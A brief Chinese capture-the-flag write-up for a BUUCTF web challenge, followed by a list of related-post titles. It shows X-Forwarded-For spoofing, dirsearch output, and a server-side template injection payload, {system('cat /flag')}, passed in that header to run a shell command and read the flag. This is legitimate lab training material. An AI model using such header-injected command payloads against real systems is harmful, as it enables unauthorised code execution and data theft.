BUUCTF WEB [BJDCTF2020]The mystery of ip
BUUCTF WEB [BJDCTF2020]The mystery of ip
在hint.php中找到一句注释
<!-- Do you know why i know your ip? -->
在flag.php中看到自己的ip,联想到X-Forwarded-For。使用Hackbar添加一个HTTP头
X-Forwarded-For: 127.0.0.1
回显为
Your IP is : 127.0.0.1
说明我们获得了可控变量
尝试命令注入失败,到这里就没什么思路了,尝试dirsearch看能不能获得什么信息
# Dirsearch started Fri Apr 22 02:06:43 2022 as: dirsearch.py -u http://node4.buuoj.cn:28825/200 6KB http://node4.buuoj.cn:28825/.DS_Store 301 169B http://node4.buuoj.cn:28825/css -> REDIRECTS TO: http://node4.buuoj.cn/css/ 200 2KB http://node4.buuoj.cn:28825/flag.php 200 938B http://node4.buuoj.cn:28825/header.php 301 169B http://node4.buuoj.cn:28825/img -> REDIRECTS TO: http://node4.buuoj.cn/img/ 301 169B http://node4.buuoj.cn:28825/libs -> REDIRECTS TO: http://node4.buuoj.cn/libs/ 301 169B http://node4.buuoj.cn:28825/templates_c -> REDIRECTS TO: http://node4.buuoj.cn/templates_c/ 403 555B http://node4.buuoj.cn:28825/templates_c/
发现一个名为
/template_c/
的文件夹,怀疑存在模板注入将X-Forwarded-For改为
X-Forwarded-For: {6*6}
回显为
Your IP is : 36
尝试直接读取flag文件
X-Forwarded-For: {system('cat /flag')}
回显
Your IP is : flag{6a4bda77-d3d8-4117-ab44-b747d76eab0b} flag{6a4bda77-d3d8-4117-ab44-b747d76eab0b}
BUUCTF WEB [BJDCTF2020]The mystery of ip相关推荐
- BUUCTF WEB [BJDCTF2020]ZJCTF,不过如此
BUUCTF WEB [BJDCTF2020]ZJCTF,不过如此 进入环境后得到源码 <?phperror_reporting(0); $text = $_GET["text&quo ...
- BUUCTF Web 第二页全部Write ups
更多笔记,可以关注yym68686.top 目录 [强网杯 2019]高明的黑客 [BUUCTF 2018]Online Tool [RoarCTF 2019]Easy Java [GXYCTF201 ...
- Buuctf -web wp汇总(一)
Buuctf -web wp汇总(一):链接 Buuctf -web wp汇总(二):链接 持续更新ing~ BuuCTF平台 文章目录 BuuCTF平台 [极客大挑战 2019]EasySQL [极 ...
- Buuctf -web wp汇总(三)
Buuctf -web wp汇总(一):链接 Buuctf -web wp汇总(二):链接 Buuctf -web wp汇总(三):链接 文章目录 [WUSTCTF2020]朴实无华 [WUSTCTF ...
- java web ip_详解Java Web如何限制访问的IP的两种方法
前一阵子因为在做项目时碰到了这个功能,现在好好总结一下,至于为什么要限制IP访问,我就不多说了.然后百度了一下,现在主要有两种方式去限制IP访问,第一种是最简单的方便的,第二种是通过过滤器来限制访问. ...
- BUUCTF Web 极客大挑战 2019 EasySQL
BUUCTF Web 极客大挑战 2019 EasySQL 文章目录 BUUCTF Web 极客大挑战 2019 EasySQL 1,输入万能密码: 2,输入万能账号 首先有点常识: 正常SQL语句这 ...
- BUUCTF WEB [BSidesCF 2020]Had a bad day
BUUCTF WEB [BSidesCF 2020]Had a bad day index.php?category=woofers' 报错 Warning: include(woofers'.php ...
- BUUCTF WEB [极客大挑战 2019]LoveSQL
BUUCTF WEB [极客大挑战 2019]LoveSQL 进入靶机后尝试万能密码登录 admin 123' or '1'='1 获得flag Login Success! Hello admin! ...
- 远程服务器ip地址可以更改吗,Web远程管理服务器端的IP地址如何进行设置?
通过Web远程管理可以对服务器进行很多设置.而"远程桌面"是Windows Server 2003较Windows 2000 Server比较明显的改进,用户可以通过Web远程管理 ...
最新文章
- 浅拷贝和深拷贝的应用
- linux 下 select 函数的用法
- pythontkinter控件单选框怎么判断是否被选中_Python GUI编程(Tkinter)Radiobutton单选框控件...
- (转)mybatis常用jdbcType数据类型
- sorl6.0+jetty+mysql搭建solr服务
- 加了密的PDF如何破解复制?
- mysql主键设置after_mysql如何改变主键属性
- 创建struct fib_info
- python批量上传执行脚本_python 写的批量操作远程主机脚本(命令执行,上传、下载文件)...
- 批量激活管理工具VAMT 3.0的安装与基本使用方法简介
- git推送代码的命令详解
- 使用Doxygen + graphviz生成Unity 3d的UGUI类图
- 使用 Kotlin , Groovy ,Java 开发一个自己的 Gradle 插件
- 夜场票为何一票难求?故宫院长在彩排现场解答观众
- blender icons 图标
- 冲突域和广播域,中继器、集线器、网桥、交换机、路由器和网关
- 【Hexo搭建个人博客】:yilia主题配置(三) - 评论系统
- Bugku-CTF (web 持续更新) ——新手ctf记录
- Learning to Compare Image Patches via Convolutional Neural Networks
- 女人的这三个“动作”,才更加让男人心动